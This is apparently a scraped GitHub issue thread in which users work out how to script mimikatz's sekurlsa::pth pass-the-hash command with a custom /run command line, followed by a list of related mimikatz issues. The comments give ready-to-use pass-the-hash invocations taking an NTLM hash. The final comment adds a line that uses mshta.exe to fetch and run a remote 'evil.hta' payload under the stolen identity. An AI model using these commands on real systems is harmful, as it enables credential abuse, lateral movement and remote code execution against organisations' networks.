Comments (5)
Hi Michael,
I think you missed it : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth
It's the /run:foo
One "not documented yet" argument is /impersonate
to affect the new token to the current mimikatz thread :)
from mimikatz.
Thx for your reply. I know about the /run parameter, but I did not know that you can pass the whole command line to it.
But I still have not figured out a way to use it in batch mode, e.g. from BAT or PS1 scripts, which is the way I use mimikatz mostly. This has not worked for me:
mimikatz.exe sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:ba8098ba09890a80b9a8098b "/run:cmd.exe /c systeminfo" exit
from mimikatz.
it's: /run"foo bar"
but arguments problem/escaping is always hard.
On my side a deal with argv[], so it's external to mimikatz to push it in the right way ;)
If I remember well, with PowerShell, you can push arguments in an array.
from mimikatz.
Neither /run"foo bar"
, nor /run:"foo bar"
works for me :-( Powershell is not helpful, either, because the entire command line has to be passed as a single string:
.\mimikatz.exe "sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:cmd.exe" exit
But nevermind, it is not that important. I just thought there would be a trivial solution.
from mimikatz.
This approach, permits to pass NOT only single string and worked for me:
.\mimikatz.exe
mimikatz # sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:"mshta.exe http://ip/evil.hta"
from mimikatz.
Related Issues (20)
- Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack HOT 8
- can't find a syntax to call Mimikatz from the command line with embedded quotes HOT 1
- Mimikatz on Windows 11 with/without Credential Guard HOT 5
- ts::logonpasswords no passwords in latest win10 build HOT 2
- Same old "ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list" again... HOT 6
- Windows 11 Build 10.0.22621.1848 HOT 2
- Problem with Decrypting Masterkeys HOT 2
- Cant export certificate and its public key to DER HOT 1
- Function kull_m_cred_create does not copy actual credentials blob size HOT 2
- arm架构上不支持凭证注入进程 HOT 3
- Not displaying passords in plain text. HOT 1
- ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list on win11-22h2-pro HOT 2
- EFS files - Masterkey with empty user password in windows login HOT 1
- UTF-8 / nanodump -> mimikatz and pypykatz errors HOT 4
- Problem Working for Windows 11 ARM64
- Mimikatz Golden Ticket fails to create PAC attribute RequestorSID
- Why i am not Getting the MasterKey
- Skeleton Key on "MSV" SSP HOT 1
- I detect a trojan when downloading the zip Trojan:Win32/Vigorf.A zip HOT 1
- oxnan/mimikatz issue : windows 21h2 22000.318 run error
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from mimikatz.